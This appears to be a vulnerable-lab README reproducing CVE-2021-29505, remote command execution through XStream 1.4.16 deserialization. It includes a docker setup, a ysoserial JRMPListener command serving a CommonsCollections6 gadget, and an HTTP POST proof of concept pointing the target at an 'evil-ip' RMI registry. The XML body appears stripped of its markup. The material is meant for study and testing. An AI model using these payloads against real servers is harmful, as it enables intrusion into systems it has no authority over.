# XStream Deserialization Remote Command Execution (CVE-2021-29505) [中文版本(Chinese version)](README.zh-cn.md) XStream is a simple library to serialize objects to XML and back again. XStream uses a blocklist mechanism when parsing XML text which is utilized to defend against deserialization vulnerabilities, but in 1.4.16 and earlier, blocklists are incomplete and attackers could use `sun.rmi.registry.RegistryImpl_Stub` to make an RMI request and execute arbitrary commands finally. Reference links. - [https://x-stream.github.io/CVE-2021-29505.html][1] - https://paper.seebug.org/1543/ ## Vulnerable Environment Start a Springboot + XStream 1.4.16 server. ``` docker compose up -d ``` Once the environment is started, you can send the following request to `http://your-ip:8080` to test if the server has started successfully ![](1.png) ## POC First of all, you have to start a malicious RMI Registry on evil server using the JRMPListener of [ysoserial](https://github.com/frohoff/ysoserial). ``` java -cp ysoserial-master-SNAPSHOT.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections6 "touch /tmp/success" ``` This RMI Registry, upon receiving the request, returns a malicious serialized object constructed with `CommonsCollections6` gadget. Then, send the XML POC of CVE-2021-29505, replace **evil-ip** with address of evil RMI Registry. ``` POST / HTTP/1.1 Host: your-ip Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Connection: close Content-Type: application/xml Content-Length: 3169 2 3 12345 com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content 12345 true SOAP_11 false aa aa UnicastRef evil-ip 1099 0 0 0 0 false evil-ip 1099 ``` The malicious RMI registry receives the RMI request successfully. ![](2.png) Enter into the XStream container, ``touch /tmp/success`` has been successfully executed: ![](3.png) Significantly, POC from [official website][1] is wrong, you must not use it. [1]: https://x-stream.github.io/CVE-2021-29505.html